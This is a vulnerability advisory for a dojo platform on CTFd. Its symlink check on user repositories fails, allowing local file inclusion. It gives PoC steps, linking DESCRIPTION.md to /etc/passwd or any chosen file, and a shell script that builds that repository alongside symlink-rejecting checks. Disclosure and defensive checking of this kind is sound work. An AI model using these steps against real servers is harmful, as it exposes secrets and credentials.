Summary
Incorrect symlink checks on user-specified dojos allow users (admin not required) to perform an LFI from the CTFd container.
Details
When a user clones or updates repositories, a check is performed to see whether the repository contains any symlinks, but the check is incorrect and does not reject them. A malicious user could craft a repository with symlinks pointing at sensitive files and then retrieve their contents through the CTFd website, which serves repository files such as DESCRIPTION.md.
PoC
Start from an empty directory.
- $ git init
- Create a dojo.yml file (https://github.com/pwncollege/example-dojo/blob/main/dojo.yml works fine but I removed the modules)
- $ ln -s /etc/passwd DESCRIPTION.md
NOTE: In the above step, /etc/passwd can be replaced with any file of your choosing
- Commit and push the dojo.yml and DESCRIPTION.md to a GitHub repo
- Create a dojo from that GitHub repo
- Navigate to the main page of the new dojo
- See the contents of the linked file rendered on the page
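The steps above, as an added example that is not part of the advisory or of the dojo project's own code. The script builds the malicious repository layout locally (the dojo.yml content is a minimal placeholder assumed here, and the git commit is only run if git is installed; pushing to GitHub and creating the dojo are manual steps), and then shows the symlink scan a server should run after every clone or update before serving any file. Function names are hypothetical.

```shell
#!/bin/sh
# Added example (not from the advisory or the dojo project).
# Builds the PoC repository and demonstrates the post-clone symlink check.

# Lay out the malicious dojo: a dojo.yml plus DESCRIPTION.md as a symlink.
# $1 = repository directory, $2 = target file (defaults to /etc/passwd).
build_malicious_dojo() {
    dir=$1
    target=${2:-/etc/passwd}
    mkdir -p "$dir"
    # Placeholder dojo.yml (assumed minimal content, not the real example-dojo file).
    printf 'id: poc\nname: PoC\nmodules: []\n' > "$dir/dojo.yml"
    # The symlink is committed as a git symlink blob; the target is resolved
    # later on whatever host checks out and reads the file.
    ln -s "$target" "$dir/DESCRIPTION.md"
    if command -v git >/dev/null 2>&1; then
        ( cd "$dir" && git init -q \
          && git add -A \
          && git -c user.name=poc -c user.email=poc@example.com commit -q -m "poc" ) \
          || return 1
    fi
}

# Print every symlink in the working tree as "path -> target", ignoring .git.
list_symlinks() {
    find "$1" -path "$1/.git" -prune -o -type l -print | while read -r link; do
        printf '%s -> %s\n' "${link#$1/}" "$(readlink "$link")"
    done
}

# The check the server should run on a freshly cloned or updated repository:
# refuse the whole repository if it contains any symlink at all. Rejecting
# every symlink is simpler and safer than trying to validate targets, since a
# link can point outside the checkout or at another link. Returns 0 when the
# repository is safe to serve, 1 otherwise.
dojo_is_safe() {
    [ -z "$(find "$1" -path "$1/.git" -prune -o -type l -print)" ]
}

# Equivalent check against the git index instead of the working tree: symlinks
# are stored with mode 120000, so any such entry means the repo is unsafe.
dojo_is_safe_git() {
    [ -z "$(git -C "$1" ls-files -s | awk '$1 == "120000" { print $4 }')" ]
}

# Demonstration when run directly.
if [ "${1:-}" = "demo" ]; then
    d=$(mktemp -d)
    build_malicious_dojo "$d" /etc/passwd
    echo "symlinks found:"
    list_symlinks "$d"
    if dojo_is_safe "$d"; then
        echo "repository accepted (vulnerable behaviour)"
    else
        echo "repository rejected: contains symlinks"
    fi
    echo "what the web server would render for DESCRIPTION.md:"
    head -n 3 "$d/DESCRIPTION.md"
    rm -rf "$d"
fi
```

Run with `sh poc.sh demo` to see the link listed, the repository rejected by the check, and the first lines of /etc/passwd read through DESCRIPTION.md, which is exactly what the CTFd page shows when the check is missing.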
Impact
This is an LFI through which server secrets and other sensitive files inside the CTFd container could be exposed to any user who can create or update a dojo.